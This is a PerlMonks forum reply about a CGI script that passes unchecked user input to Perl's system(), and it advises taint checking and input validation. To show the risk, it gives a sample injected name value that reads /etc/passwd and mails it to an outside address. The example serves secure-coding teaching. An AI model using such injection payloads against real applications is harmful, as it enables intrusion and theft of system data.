system("perl prn_to_file.pl $param1 > ../results/output.txt");

[download]

So if I visit your website, and my name happens to be: "; cat /etc/passwd | mail foo@bar.com ;" - what do you think will happen?

Possibly nothing, if your webuser doesn't have sufficient privileges - but I'm sure you get the idea. Calling the single-argument form of system from within a CGI script, and using data that hasn't been taint-checked is pretty-much like putting a sign up saying "Here I am - come and own me".

I think you're going about this the wrong way. Firstly, if you're going to be accepting data from the outside world (ie. your users), enable taint checking and validate your input. merlyn has a very good article that covers this.

Secondly, why bother calling an external script in the first place? What's wrong with simply writing to the output file from within the same script?

In reply to Re: Failed System/Exec Call under Right Permission with CGI by McDarren
in thread Failed System/Exec Call under Right Permission with CGI by neversaint

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post, it's "PerlMonks-approved HTML":


  • Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
  • Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
  • Read Where should I post X? if you're not absolutely sure you're posting in the right place.
  • Please read these before you post! —
  • Posts may use any of the Perl Monks Approved HTML tags:
    a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
  • You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
            For:     Use:
    & &amp;
    < &lt;
    > &gt;
    [ &#91;
    ] &#93;
  • Link using PerlMonks shortcuts! What shortcuts can I use for linking?
  • See Writeup Formatting Tips and other pages linked from there for more info.